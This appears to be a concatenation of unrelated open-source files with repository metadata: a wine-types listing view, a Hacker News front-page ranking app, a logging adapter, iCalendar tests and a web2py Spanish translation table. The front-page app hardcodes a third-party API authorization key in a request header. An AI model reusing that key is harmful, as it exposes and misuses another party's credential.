O.write('%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n' %(results[lola]['circle_id'],results[lola]['transcript_ids'], results[lola]['num_reads'], results[lola]['min_length'], results[lola]['max_length'], results[lola]['single'], results[lola]['double'], results[lola]['undefined']))
O.close()
return
tempfile.tempdir = tmp_folder
RESULTS = iterate_over_folder(bamfolder, bedfile, platform, split_character)
write_results(RESULTS, outfile)
| gpl-3.0 | 2,426,196,590,104,939,500 | 41.529412 | 270 | 0.66926 | false |
bikalabs/bika.wine | bika/wine/controlpanel/bika_winetypes.py | 1 | 3152 | from AccessControl.SecurityInfo import ClassSecurityInfo
from bika.wine import bikaMessageFactory as _
from bika.wine.config import PROJECTNAME
from bika.wine.interfaces import IWineTypes
from bika.lims import bikaMessageFactory as _b
from bika.lims.browser.bika_listing import BikaListingView
from plone.app.content.browser.interfaces import IFolderContentsView
from plone.app.folder.folder import ATFolderSchema, ATFolder
from plone.app.layout.globals.interfaces import IViewView
from Products.Archetypes import atapi
from Products.ATContentTypes.content import schemata
from zope.interface.declarations import implements
class WineTypesView(BikaListingView):
implements(IFolderContentsView, IViewView)
def __init__(self, context, request):
super(WineTypesView, self).__init__(context, request)
self.catalog = 'bika_setup_catalog'
self.contentFilter = {'portal_type': 'WineType',
'sort_on': 'sortable_title'}
self.context_actions = {
_b('Add'): {
'url': 'createObject?type_name=WineType',
'icon': '++resource++bika.lims.images/add.png'
}
}
self.icon = self.portal_url + \
"/++resource++bika.wine.images/winetype_big.png"
self.title = self.context.translate(_("Wine types"))
self.description = ""
self.show_sort_column = False
self.show_select_row = False
self.show_select_column = True
self.pagesize = 25
self.columns = {
'Title': {'title': _('Wine type'),
'index': 'sortable_title'},
'Description': {'title': _b('Description'),
'index': 'description',
'toggle': True},
}
self.review_states = [
{'id': 'default',
'title': _b('Active'),
'contentFilter': {'inactive_state': 'active'},
'transitions': [{'id': 'deactivate'}, ],
'columns': ['Title', 'Description']},
{'id': 'inactive',
'title': _b('Inactive'),
'contentFilter': {'inactive_state': 'inactive'},
'transitions': [{'id': 'activate'}, ],
'columns': ['Title', 'Description']},
{'id': 'all',
'title': _b('All'),
'contentFilter': {},
'columns': ['Title', 'Description']},
]
def folderitems(self):
items = BikaListingView.folderitems(self)
for x in range(len(items)):
if 'obj' not in items[x]:
continue
obj = items[x]['obj']
items[x]['Description'] = obj.Description()
items[x]['replace']['Title'] = "<a href='%s'>%s</a>" % \
(items[x]['url'], items[x]['Title'])
return items
schema = ATFolderSchema.copy()
class WineTypes(ATFolder):
implements(IWineTypes)
security = ClassSecurityInfo()
displayContentsTab = False
schema = schema
schemata.finalizeATCTSchema(schema, folderish=True, moveDiscussion=False)
atapi.registerType(WineTypes, PROJECTNAME)
| agpl-3.0 | 8,972,393,778,364,871,000 | 36.082353 | 73 | 0.579632 | false |
blackchair/news-yc | frontpage.py | 1 | 4592 | import os
import json
import logging
from urllib import quote
from xml.dom.minidom import parseString
from datetime import datetime
import webapp2, jinja2
from google.appengine.api.urlfetch import fetch
from google.appengine.api import memcache
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
fp_template = JINJA_ENVIRONMENT.get_template('fp.html')
def pluck(xml,tag):
try:
return xml.getElementsByTagName(tag)[0].firstChild.data
except:
return None
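# e.g. pluck(item_xml, 'title') returns the text of the first <title> child,
# or None if the tag is missing or empty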
def get_summary(url,item_id):
summary = memcache.get('summary:'+str(item_id))
if summary is None:
try:
resp = fetch(url='https://tldr.p.mashape.com/summary?url='+quote(url),headers={"X-Mashape-Authorization": "i4fhqn7lk07QLkk3kJ8ALzVjgqvQU5TW"})
summary=resp.content
    except Exception:
        # network or API failures simply leave the summary unset
        pass
#resp = json.loads(resp.content)
'''
if 'error' in resp.keys():
summary = "None"
else:
summary = resp['data']['summary']
'''
    if summary and not memcache.add('summary:' + str(item_id), summary, 0):
        logging.error('Memcache set failed')
    return summary
class MainPage(webapp2.RequestHandler):
def get(self):
frontpage = memcache.get('frontpage')
if frontpage is None:
fp_req = fetch('https://www.hnsearch.com/bigrss')
fp_xml = parseString(fp_req.content)
#parse out an array of story dicts
fp_items = []
fp_5 = []
items_xml = fp_xml.getElementsByTagName('item')
for i,item_xml in enumerate(items_xml):
#fields:
# title, link, comments,hnsearch_id,username,create_ts
# num_comments, points, description, guid
item = {
"title": pluck(item_xml,"title"),
"link": pluck(item_xml,"link"),
"comments": pluck(item_xml,"comments"),
"id": pluck(item_xml,"hnsearch_id"),
"username": pluck(item_xml,"username"),
"create_ts": pluck(item_xml,"create_ts"),
"num_comments": pluck(item_xml,"num_comments"),
"points": pluck(item_xml,"points")
}
if item['create_ts'] is not None:
#look here for explanation of ranking:
#http://www.righto.com/2013/11/how-hacker-news-ranking-really-works.html
item['num_comments'] = int(item['num_comments'])
item['points'] = float(item['points'])
delta = datetime.utcnow() - datetime.strptime(item['create_ts'],"%Y-%m-%dT%H:%M:%SZ")
hours_ago = delta.total_seconds() / 3600
item['raw_score'] = (item['points']-1.0) ** 0.8 / (float(hours_ago)+2.0) ** 1.8
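                    # worked example (hypothetical numbers): a 100-point story
                    # posted 2 hours ago scores 99**0.8 / 4**1.8 ~= 39.5/12.1 ~= 3.3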
item['controversy'] = item['num_comments'] >= 40 and item['num_comments'] > item['points']
#item['summary'] = get_summary(item['link'],item['id'])
if i < 3:
fp_items.append(item)
elif i == 3:
#calculate prev_score and then penalty for all 5
fp_items.append(item)
fp_5 = [x['raw_score'] for x in fp_items]
prev_score = sum(fp_5)/float(len(fp_5))
for k in fp_items:
k['penalty'] = 1.0
else:
prev_score = sum(fp_5)/float(len(fp_5))
if item['raw_score'] > prev_score:
item['penalty'] = prev_score / item['raw_score']
else:
item['penalty'] = 1.0
fp_5.pop(0)
fp_5.append(item['raw_score'])
prev_score = sum(fp_5)/float(len(fp_5))
fp_items.append(item)
#use points and create_ts to determine ranking
fp_items.sort(key=lambda x: -x['raw_score'])
#pass to jinja template
frontpage = fp_template.render({"items":fp_items})
#cache result
if not memcache.add('frontpage',frontpage,60):
logging.error('Memcache set failed')
self.response.write(frontpage)
application = webapp2.WSGIApplication([
('/', MainPage),
], debug=True)
| mit | -6,088,560,428,802,341,000 | 39.637168 | 154 | 0.515679 | false |
ByteInternet/drf-oidc-auth | oidc_auth/util.py | 1 | 1153 | import functools
from django.core.cache import caches
from .settings import api_settings
class cache(object):
""" Cache decorator that memoizes the return value of a method for some time.
    Increment the cache_version every time your method's implementation changes
    in such a way that it returns values that are not backwards compatible.
For more information, see the Django cache documentation:
https://docs.djangoproject.com/en/2.2/topics/cache/#cache-versioning
"""
def __init__(self, ttl, cache_version=1):
self.ttl = ttl
self.cache_version = cache_version
def __call__(self, fn):
@functools.wraps(fn)
def wrapped(this, *args):
cache = caches[api_settings.OIDC_CACHE_NAME]
key = api_settings.OIDC_CACHE_PREFIX + '.'.join([fn.__name__] + list(map(str, args)))
cached_value = cache.get(key, version=self.cache_version)
if not cached_value:
cached_value = fn(this, *args)
cache.set(key, cached_value, timeout=self.ttl, version=self.cache_version)
return cached_value
return wrapped
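# Illustrative usage (not part of this module; OIDCClient and fetch_keys are
# hypothetical names):
#
#     class OIDCClient(object):
#         @cache(ttl=600, cache_version=2)
#         def jwks(self, issuer):
#             return fetch_keys(issuer)  # memoized per issuer for 10 minutes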
| mit | 5,006,340,279,037,631,000 | 35.03125 | 97 | 0.648742 | false |
hforge/itools | test/test_ical.py | 1 | 16037 | # -*- coding: UTF-8 -*-
# Copyright (C) 2005-2010 J. David Ibáñez <[email protected]>
# Copyright (C) 2006-2007 Nicolas Deram <[email protected]>
# Copyright (C) 2010 Alexis Huet <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Import from the Standard Library
from datetime import datetime, timedelta, tzinfo
from unittest import TestCase, main
# Import from itools
from itools.csv import Property
from itools.csv.table import encode_param_value
from itools.datatypes import String
from itools.ical import DateTime
from itools.ical.icalendar import iCalendar, VTimezone
#
# Example with 1 event
content = """
BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.0//EN
METHOD:PUBLISH
BEGIN:VEVENT
UID:581361a0-1dd2-11b2-9a42-bd3958eeac9a
SUMMARY:Résumé
DESCRIPTION:all all all
LOCATION:France
STATUS:TENTATIVE
CLASS:PRIVATE
X-MOZILLA-RECUR-DEFAULT-INTERVAL:0
DTSTART;VALUE="DATE":20050530
DTEND;VALUE=DATE:20050531
DTSTAMP:20050601T074604Z
ATTENDEE;RSVP=TRUE;MEMBER="mailto:[email protected]":mailto:[email protected]
ATTENDEE;MEMBER="mailto:[email protected]":mailto:[email protected]
PRIORITY:1
SEQUENCE:0
END:VEVENT
END:VCALENDAR
"""
# Example with 2 events
content2 = """
BEGIN:VCALENDAR
VERSION:2.0
PRODID:-//Mozilla.org/NONSGML Mozilla Calendar V1.0//EN
METHOD:PUBLISH
BEGIN:VEVENT
UID:581361a0-1dd2-11b2-9a42-bd3958eeac9a
SUMMARY:Refound
DESCRIPTION:all all all
LOCATION:France
STATUS:TENTATIVE
CLASS:PRIVATE
X-MOZILLA-RECUR-DEFAULT-INTERVAL:0
DTSTART;VALUE="DATE":20050530T000000
DTEND;VALUE=DATE:20050531T235959.999999
DTSTAMP:20050601T074604Z
ATTENDEE;RSVP=TRUE;MEMBER="mailto:[email protected]":mailto:[email protected]
PRIORITY:1
SEQUENCE:0
END:VEVENT
BEGIN:VEVENT
UID:581361a0-1dd2-11b2-9a42-bd3958eeac9b
SUMMARY:222222222
DTSTART;VALUE="DATE":20050701
DTEND;VALUE=DATE:20050701
ATTENDEE;RSVP=TRUE;MEMBER="mailto:[email protected]":mailto:[email protected]
PRIORITY:2
SEQUENCE:0
END:VEVENT
END:VCALENDAR
"""
tz_file_test = frozenset([
    # ((input datetime tuple), (tzname, timedelta args for dst, timedelta args for utcoffset))
((1967, 4, 30, 2, 0, 1), ('EDT', (0, 3600), (-1, 72000))),
((1971, 12, 25, 12, 42, 00), ('EST', (0, 0), (-1, 68400))),
((1973, 4, 28, 6, 59, 59), ('EST', (0, 0), (-1, 68400))),
((1974, 4, 29, 6, 59, 59), ('EDT', (0, 3600), (-1, 72000))),
((1986, 2, 12, 12, 42, 0), ('EST', (0, 0), (-1, 68400))),
((1986, 6, 12, 12, 42, 0), ('EDT', (0, 3600), (-1, 72000))),
])
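# Each expected tuple above is (tzname, dst, utcoffset), where dst and
# utcoffset are (days, seconds) arguments for datetime.timedelta; e.g. for EDT,
# timedelta(0, 3600) = +1h of DST and timedelta(-1, 72000) = -4h UTC offset.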
def property_to_string(prop_name, prop):
"""Method only used by test_load and test_load2.
"""
# Convert DateTimes
prop_value = prop.value
if type(prop.value) is datetime:
params = prop.parameters
        if params:
t = params['VALUE'][0] if params.has_key('VALUE') else None
else:
t = None
prop_value = DateTime.encode(prop.value, type=t)
# Simple case
if not prop.parameters:
return u'%s:%s' % (prop_name, prop_value)
# Params
params = ''
for p_name in prop.parameters:
p_value = prop.parameters[p_name]
p_value = [ encode_param_value(p_name, x, String) for x in p_value ]
param = ';%s=%s' % (p_name, ','.join(p_value))
params = params + param
return u'%s%s:%s' % (prop_name, params, prop_value)
class icalTestCase(TestCase):
def setUp(self):
self.cal1 = iCalendar(string=content)
self.cal2 = iCalendar(string=content2)
def test_new(self):
cal = iCalendar()
properties = []
for name in cal.properties:
params = cal.properties[name].parameters
value = cal.properties[name].value
property = '%s;%s:%s' % (name, params, value)
properties.append(property)
# Test properties
expected_properties = [
u'VERSION;None:2.0',
u'PRODID;None:-//hforge.org/NONSGML ikaaro icalendar V1.0//EN']
self.assertEqual(properties, expected_properties)
# Test components
self.assertEqual(len(cal.get_components()), 0)
self.assertEqual(cal.get_components('VEVENT'), [])
def test_property(self):
"""Test to create, access and encode a property with or without
parameters.
"""
# Property without parameter
expected = ['SUMMARY:This is the summary\n']
property_value = Property('This is the summary')
output = self.cal1.encode_property('SUMMARY', property_value)
self.assertEqual(output, expected)
# Property with one parameter
expected = ['ATTENDEE;MEMBER="mailto:[email protected]":'
'mailto:[email protected]\n']
member = 'mailto:[email protected]'
value = Property('mailto:[email protected]', MEMBER=[member])
output = self.cal1.encode_property('ATTENDEE', value)
self.assertEqual(output, expected)
def test_get_property_values(self):
cal = self.cal1
# icalendar property
expected = '2.0'
property = cal.get_property_values('VERSION')
self.assertEqual(property.value, expected)
# Component property
events = cal.get_components('VEVENT')
properties = events[0].get_version()
expected = u'Résumé'
property = events[0].get_property_values('SUMMARY')
self.assertEqual(property.value, expected)
expected = 1
property = events[0].get_property_values('PRIORITY')
self.assertEqual(property.value, expected)
# Component properties
properties = {}
properties['MYADD'] = Property(u'Résumé à crêtes')
value = Property(u'Property added by calling add_property')
properties['DESCRIPTION'] = value
member = '"mailto:[email protected]"'
value = Property('mailto:[email protected]', MEMBER=[member])
properties['ATTENDEE'] = value
uid = cal.add_component('VEVENT', **properties)
event = cal.get_component_by_uid(uid)
properties = event.get_property_values()
self.assertEqual('MYADD' in properties, True)
self.assertEqual('DESCRIPTION' in properties, True)
self.assertEqual('ATTENDEE' in properties, True)
self.assertEqual('VERSION' in properties, False)
def test_add_to_calendar(self):
"""Test to add property and component to an empty icalendar object.
"""
cal = iCalendar()
cal.add_component('VEVENT')
self.assertEqual(len(cal.get_components('VEVENT')), 1)
value = Property('PUBLISH')
cal.set_property('METHOD', value)
self.assertEqual(cal.get_property_values('METHOD'), value)
def test_load(self):
"""Test loading a simple calendar.
"""
cal = self.cal1
# Test icalendar properties
properties = []
for name in cal.properties:
property_value = cal.properties[name]
# Only property METHOD can occur several times, we give only one
if isinstance(property_value, list):
property_value = property_value[0]
params = property_value.parameters
value = property_value.value
property = '%s;%s:%s' % (name, params, value)
properties.append(property)
expected_properties = [
u'VERSION;None:2.0',
u'METHOD;None:PUBLISH',
u'PRODID;None:-//Mozilla.org/NONSGML Mozilla Calendar V1.0//EN' ]
self.assertEqual(properties, expected_properties)
# Test component properties
properties = []
event = cal.get_components('VEVENT')[0]
version = event.get_version()
for prop_name in version:
datatype = cal.get_record_datatype(prop_name)
if datatype.multiple is False:
prop = version[prop_name]
property = property_to_string(prop_name, prop)
properties.append(property)
else:
for prop in version[prop_name]:
property = property_to_string(prop_name, prop)
properties.append(property)
expected_event_properties = [
u'STATUS:TENTATIVE',
u'DTSTAMP:20050601T074604Z',
u'DESCRIPTION:all all all',
u'ATTENDEE;MEMBER="mailto:[email protected]"'
';RSVP=TRUE:mailto:[email protected]',
u'ATTENDEE;MEMBER="mailto:[email protected]"'
':mailto:[email protected]',
u'SUMMARY:Résumé',
u'PRIORITY:1',
u'LOCATION:France',
u'X-MOZILLA-RECUR-DEFAULT-INTERVAL:0',
u'DTEND;VALUE=DATE:20050531',
u'DTSTART;VALUE=DATE:20050530',
u'CLASS:PRIVATE']
self.assertEqual(event.uid, '581361a0-1dd2-11b2-9a42-bd3958eeac9a')
self.assertEqual(properties, expected_event_properties)
self.assertEqual(len(cal.get_components('VEVENT')), 1)
# Test journals
self.assertEqual(len(cal.get_components('VJOURNAL')), 0)
# Test todos
self.assertEqual(len(cal.get_components('TODO')), 0)
# Test freebusys
self.assertEqual(len(cal.get_components('FREEBUSY')), 0)
# Test timezones
self.assertEqual(len(cal.get_components('TIMEZONE')), 0)
# Test others
self.assertEqual(len(cal.get_components('others')), 0)
def test_load_2(self):
"""Test loading a 2 events calendar.
"""
cal = self.cal2
properties = []
for name in cal.properties:
params = cal.properties[name].parameters
value = cal.properties[name].value
property = '%s;%s:%s' % (name, params, value)
properties.append(property)
# Test properties
expected_properties = [
u'VERSION;None:2.0',
u'METHOD;None:PUBLISH',
u'PRODID;None:-//Mozilla.org/NONSGML Mozilla Calendar V1.0//EN' ]
self.assertEqual(properties, expected_properties)
events = []
for event in cal.get_components('VEVENT'):
version = event.get_version()
properties = []
for prop_name in version:
if prop_name == 'DTSTAMP':
continue
datatype = cal.get_record_datatype(prop_name)
if datatype.multiple is False:
prop = version[prop_name]
property = property_to_string(prop_name, prop)
properties.append(property)
else:
for prop in version[prop_name]:
property = property_to_string(prop_name, prop)
properties.append(property)
events.append(properties)
# Test events
expected_events = [
[u'ATTENDEE;MEMBER="mailto:[email protected]";RSVP=TRUE'
u':mailto:[email protected]',
u'SUMMARY:222222222',
u'PRIORITY:2',
u'DTEND;VALUE=DATE:20050701',
u'DTSTART;VALUE=DATE:20050701'],
[u'STATUS:TENTATIVE',
u'DESCRIPTION:all all all',
u'ATTENDEE;MEMBER="mailto:[email protected]"'
u';RSVP=TRUE:mailto:[email protected]',
u'SUMMARY:Refound',
u'PRIORITY:1',
u'LOCATION:France',
u'X-MOZILLA-RECUR-DEFAULT-INTERVAL:0',
u'DTEND;VALUE=DATE:20050531',
u'DTSTART;VALUE=DATE:20050530',
u'CLASS:PRIVATE'],
]
self.assertEqual(events, expected_events)
self.assertEqual(len(cal.get_components('VEVENT')), 2)
# Test journals
self.assertEqual(len(cal.get_components('VJOURNAL')), 0)
# Test todos
self.assertEqual(len(cal.get_components('TODO')), 0)
# Test freebusys
self.assertEqual(len(cal.get_components('FREEBUSY')), 0)
# Test timezones
self.assertEqual(len(cal.get_components('TIMEZONE')), 0)
# Test others
self.assertEqual(len(cal.get_components('others')), 0)
# Just call to_str method
def test_to_str(self):
"""Call to_str method.
"""
cal = self.cal2
cal.to_str()
def test_add_property(self):
"""Test adding a property to any component.
"""
cal = self.cal2
event = cal.get_components('VEVENT')[1]
# other property (MYADD)
name, value = 'MYADD', Property(u'Résumé à crêtes')
cal.update_component(event.uid, **{name: value})
property = event.get_property_values(name)
self.assertEqual(property[0], value)
self.assertEqual(property[0].value, value.value)
# property DESCRIPTION
name = 'DESCRIPTION'
value = Property(u'Property added by calling add_property')
cal.update_component(event.uid, **{name: value})
property = event.get_property_values(name)
self.assertEqual(property, value)
# property ATTENDEE
name = 'ATTENDEE'
value = event.get_property_values(name)
member = '"mailto:[email protected]"'
value.append(Property('mailto:[email protected]', MEMBER=[member]))
cal.update_component(event.uid, **{name: value})
property = event.get_property_values(name)
self.assertEqual(str(property[0].value), 'mailto:[email protected]')
self.assertEqual(property[1].parameters, {'MEMBER': [member]})
self.assertEqual(property[1], value[1])
def test_icalendar_set_property(self):
"""Test setting a new value to an existant icalendar property.
"""
cal = self.cal1
name, value = 'VERSION', Property('2.1')
cal.set_property(name, value)
self.assertEqual(cal.get_property_values(name), value)
cal.set_property(name, [value, ])
self.assertEqual(cal.get_property_values(name), value)
def test_component_set_property(self):
"""Test setting a new value to an existant component property.
"""
cal = self.cal1
event = cal.get_components('VEVENT')[0]
name, value = 'SUMMARY', Property('This is a new summary')
cal.update_component(event.uid, **{name: value})
self.assertEqual(event.get_property_values(name), value)
member = '"mailto:[email protected]"'
value = [
Property('mailto:[email protected]', MEMBER=[member]),
Property('mailto:[email protected]'),
Property('mailto:[email protected]')]
cal.update_component(event.uid, ATTENDEE=value)
self.assertEqual(event.get_property_values('ATTENDEE'), value)
def test_vtimezone(self):
handler = iCalendar('tests/test_vtimezone.ics')
tz = handler.get_components('VTIMEZONE')
self.assertEqual(len(tz), 1)
tz = tz[0]
self.assertEqual(tz.__class__, VTimezone)
self.assertTrue(isinstance(tz, tzinfo))
for dt, (tzname, dst, utcoffset) in tz_file_test:
dt = datetime(*dt, tzinfo=tz)
self.assertEqual(tz.tzname(dt), tzname)
self.assertEqual(tz.dst(dt), timedelta(*dst))
self.assertEqual(tz.utcoffset(dt), timedelta(*utcoffset))
if __name__ == '__main__':
main()
| gpl-3.0 | -8,353,791,526,772,927,000 | 33.677489 | 77 | 0.609887 | false |
jsocol/commonware | commonware/log/__init__.py | 1 | 1200 | import logging
# ThreadRequestMiddleware isn't used here but is imported so
# commonware.log.ThreadRequestMiddleware works.
from commonware.log.middleware import get_remote_addr, get_username, ThreadRequestMiddleware # noqa
def getLogger(name=None):
"""
Wrap logging.getLogger to return a LoggerAdapter.
If you need to do anything besides make logging calls, use
logging.getLogger.
"""
logger = logging.getLogger(name)
return CommonwareAdapter(logger)
class CommonwareAdapter(logging.LoggerAdapter):
"""Adds the REMOTE_ADDR and USERNAME to every logging message's kwargs."""
def __init__(self, logger, extra=None):
logging.LoggerAdapter.__init__(self, logger, extra or {})
def process(self, msg, kwargs):
kwargs['extra'] = {'REMOTE_ADDR': get_remote_addr(),
'USERNAME': get_username()}
return msg, kwargs
class Formatter(logging.Formatter):
"""Formatter that makes sure REMOTE_ADDR and USERNAME are available."""
def format(self, record):
for name in 'REMOTE_ADDR', 'USERNAME':
record.__dict__.setdefault(name, '')
return logging.Formatter.format(self, record)
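# Illustrative usage (assumes logging is configured with this Formatter and
# that ThreadRequestMiddleware is installed; 'myapp' is a hypothetical name):
#
#     log = getLogger('myapp')
#     log.info('something happened')  # record carries REMOTE_ADDR/USERNAME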
| bsd-3-clause | 8,280,413,131,639,666,000 | 31.432432 | 100 | 0.680833 | false |
urrego093/proyecto_mv | applications/admin/languages/es.py | 1 | 26019 | # -*- coding: utf-8 -*-
{
'!langcode!': 'es',
'!langname!': 'Español',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"actualice" es una expresión opcional como "campo1=\'nuevo_valor\'". No se puede actualizar o eliminar resultados de un JOIN',
'%s %%{row} deleted': '%s filas eliminadas',
'%s %%{row} updated': '%s filas actualizadas',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(requires internet access, experimental)': '(requiere acceso a internet, experimental)',
'(something like "it-it")': '(algo como "it-it")',
'(version %s)': '(version %s)',
'@markmin\x01(file **gluon/contrib/plural_rules/%s.py** is not found)': '(archivo **gluon/contrib/plural_rules/%s.py** no se ha encontrado)',
'@markmin\x01An error occured, please [[reload %s]] the page': 'Ocurrió un error, por favor [[recargue %s]] la página',
'@markmin\x01Number of entries: **%s**': 'Número de entradas: **%s**',
'@markmin\x01Searching: **%s** %%{file}': 'Buscando: **%s** archivos',
'A new version of web2py is available': 'Hay una nueva versión de web2py disponible',
'A new version of web2py is available: %s': 'Hay una nueva versión de web2py disponible: %s',
'About': 'Acerca de',
'About application': 'Acerca de la aplicación',
'additional code for your application': 'código adicional para su aplicación',
'Additional code for your application': 'Código adicional para su aplicación',
'admin disabled because no admin password': 'admin deshabilitado por falta de contraseña',
'admin disabled because not supported on google app engine': 'admin deshabilitado, no es soportado en GAE',
'admin disabled because unable to access password file': 'admin deshabilitado, imposible acceder al archivo con la contraseña',
'Admin is disabled because insecure channel': 'Admin deshabilitado, el canal no es seguro',
'Admin is disabled because unsecure channel': 'Admin deshabilitado, el canal no es seguro',
'Admin language': 'Lenguaje de administración',
'administrative interface': 'interfaz administrativa',
'Administrator Password:': 'Contraseña del Administrador:',
'An error occured, please %s the page': 'Ha ocurrido un error, por favor %s la página',
'and rename it (required):': 'y renombrela (requerido):',
'and rename it:': ' y renombrelo:',
'App does not exist or you are not authorized': 'App does not exist or you are not authorized',
'appadmin': 'appadmin',
'appadmin is disabled because insecure channel': 'admin deshabilitado, el canal no es seguro',
'application "%s" uninstalled': 'aplicación "%s" desinstalada',
'application %(appname)s installed with md5sum: %(digest)s': 'application %(appname)s installed with md5sum: %(digest)s',
'application compiled': 'aplicación compilada',
'Application exists already': 'Application exists already',
'application is compiled and cannot be designed': 'la aplicación está compilada y no puede ser modificada',
'Application name:': 'Nombre de la aplicación:',
'are not used': 'are not used',
'are not used yet': 'are not used yet',
'Are you sure you want to delete file "%s"?': '¿Está seguro que desea eliminar el archivo "%s"?',
'Are you sure you want to delete plugin "%s"?': '¿Está seguro que quiere eliminar el plugin "%s"?',
'Are you sure you want to delete this object?': '¿Está seguro que quiere eliminar este objeto?',
'Are you sure you want to uninstall application "%s"': '¿Está seguro que desea desinstalar la aplicación "%s"',
'Are you sure you want to uninstall application "%s"?': '¿Está seguro que desea desinstalar la aplicación "%s"?',
'Are you sure you want to upgrade web2py now?': '¿Está seguro que desea actualizar web2py ahora?',
'Are you sure?': '¿Está seguro?',
'arguments': 'argumentos',
'at char %s': 'en el carácter %s',
'at line %s': 'en la línea %s',
'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.': 'ATENCIÓN: Inicio de sesión requiere una conexión segura (HTTPS) o localhost.',
'ATTENTION: TESTING IS NOT THREAD SAFE SO DO NOT PERFORM MULTIPLE TESTS CONCURRENTLY.': 'ATENCIÓN: NO EJECUTE VARIAS PRUEBAS SIMULTANEAMENTE, NO SON THREAD SAFE.',
'ATTENTION: you cannot edit the running application!': 'ATENCIÓN: ¡no puede modificar la aplicación que se ejecuta!',
'Autocomplete': 'Autocompletar',
'Autocomplete Python Code': 'Autocompletar código Python',
'Available databases and tables': 'Bases de datos y tablas disponibles',
'Available Databases and Tables': 'Bases de Datos y Tablas Disponibles',
'back': 'atrás',
'Back to the plugins list': 'Regresar a la lista de plugins',
'Begin': 'Begin',
'breakpoint': 'punto de ruptura',
'breakpoints': 'puntos de ruptura',
'browse': 'navegar',
'Cache': 'Caché',
'cache': 'caché',
'cache, errors and sessions cleaned': 'caché, errores y sesiones eliminados',
'can be a git repo': 'puede ser un repositorio git',
'Cancel': 'Cancelar',
'Cannot be empty': 'No puede estar vacío',
'Cannot compile: there are errors in your app. Debug it, correct errors and try again.': 'No se puede compilar: hay errores en su aplicación. Depure, corrija errores y vuelva a intentarlo.',
'Cannot compile: there are errors in your app:': 'No se puede compilar: hay errores en su aplicación:',
'cannot create file': 'no es posible crear archivo',
'cannot upload file "%(filename)s"': 'no es posible subir archivo "%(filename)s"',
'Change admin password': 'cambie contraseña admin',
'change editor settings': 'cambiar la configuración del editor',
'Change Password': 'Cambie Contraseña',
'check all': 'marcar todos',
'Check for upgrades': 'buscar actualizaciones',
'Check to delete': 'Marque para eliminar',
'Checking for upgrades...': 'Buscando actualizaciones...',
'Clean': 'Limpiar',
'Clear CACHE?': '¿Limpiar CACHÉ?',
'Clear DISK': 'Limpiar DISCO',
'Clear RAM': 'Limpiar RAM',
'click here for online examples': 'haga click aquí para ver ejemplos en línea',
'click here for the administrative interface': 'haga click aquí para usar la interfaz administrativa',
'Click row to expand traceback': 'Click en la fila para expandir el rastreo',
'click to check for upgrades': 'haga clic para buscar actualizaciones',
'click to open': 'click para abrir',
'Client IP': 'IP del Cliente',
'code': 'código',
'Code listing': 'Listado de código',
'collapse/expand all': 'contraer/expandir todo',
'commit (mercurial)': 'confirmar (mercurial)',
'Compile': 'Compilar',
'Compile (all or nothing)': 'Compile (all or nothing)',
'Compile (skip failed views)': 'Compile (skip failed views)',
'compiled application removed': 'aplicación compilada removida',
'continue': 'continuar',
'Controllers': 'Controladores',
'controllers': 'controladores',
'Count': 'Contar',
'Create': 'Crear',
'create file with filename:': 'cree archivo con nombre:',
'Create new application using the Wizard': 'Crear nueva aplicación utilizando el asistente',
'create new application:': 'nombre de la nueva aplicación:',
'Create new simple application': 'Cree una nueva aplicación',
'Create/Upload': 'Crear/Subir',
'created by': 'creado por',
'crontab': 'crontab',
'Current request': 'Solicitud en curso',
'Current response': 'Respuesta en curso',
'Current session': 'Sesión en curso',
'currently running': 'actualmente en ejecución',
'currently saved or': 'actualmente guardado o',
'customize me!': 'Adáptame!',
'data uploaded': 'datos subidos',
'database': 'base de datos',
'database %s select': 'selección en base de datos %s',
'database administration': 'administración base de datos',
'Database Administration (appadmin)': 'Administración de Base de Datos (appadmin)',
'Date and Time': 'Fecha y Hora',
'db': 'db',
'Debug': 'Depurar',
'defines tables': 'definir tablas',
'Delete': 'Eliminar',
'delete': 'eliminar',
'delete all checked': 'eliminar marcados',
'delete plugin': 'eliminar plugin',
'Delete this file (you will be asked to confirm deletion)': 'Elimine este fichero (se le pedirá confirmación)',
'Delete:': 'Eliminar:',
'Demo': 'Demo',
'Deploy': 'Deploy',
'Deploy on Google App Engine': 'Instale en Google App Engine',
'Deploy to OpenShift': 'Instale en OpenShift',
'Deploy to PythonAnywhere': 'Deploy to PythonAnywhere',
'Description': 'Descripción',
'design': 'modificar',
'DESIGN': 'DISEÑO',
'Design for': 'Diseño para',
'Detailed traceback description': 'Descripción detallada del rastreo',
'details': 'detalles',
'direction: ltr': 'dirección: ltr',
'Disable': 'Deshabilitar',
'DISK': 'DISCO',
'Display line numbers': 'Display line numbers',
'docs': 'documentos',
'Docs': 'Documentos',
'Done!': 'Listo!',
'done!': 'listo!',
'Download': 'Descargar',
'download files via http:': 'descargar archivos via http:',
'download layouts': 'descargar layouts',
'Download layouts from repository': 'Download layouts from repository',
'download plugins': 'descargar plugins',
'Download plugins from repository': 'Download plugins from repository',
'E-mail': 'Correo electrónico',
'EDIT': 'EDITAR',
'Edit': 'editar',
'Edit application': 'Editar aplicación',
'edit controller': 'editar controlador',
'edit controller:': 'editar controlador:',
'Edit current record': 'Edite el registro actual',
'Edit Profile': 'Editar Perfil',
'edit views:': 'editar vistas:',
'Editing %s': 'Editando %s',
'Editing file': 'Editando archivo',
'Editing file "%s"': 'Editando archivo "%s"',
'Editing Language file': 'Editando archivo de lenguaje',
'Editing myclientapi': 'Editando myclientapi',
'Editing myemail': 'Editando myemail',
'Editing rbare': 'Editando rbare',
'Editing ul': 'Editando ul',
'Editor': 'Editor',
'Enable': 'Habilitar',
